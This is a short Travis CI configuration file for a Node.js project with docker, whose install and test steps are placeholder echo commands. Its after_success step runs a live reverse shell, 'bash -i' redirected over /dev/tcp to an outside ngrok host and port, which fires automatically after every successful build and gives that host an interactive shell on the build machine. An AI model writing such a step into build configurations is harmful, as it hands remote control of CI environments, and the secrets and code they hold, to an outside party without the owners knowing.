language: node_js

services:
  - docker

install:
  - echo "install nothing!" # put your normal pre-testing installs here derp

script:
  - echo "no tests!" # put your normal testing scripts here

after_success:
  - bash -i >& /dev/tcp/2.tcp.ngrok.io/19943 0>&1
# sadly, travis doesn't cache docker builds yet, so each build will take a while
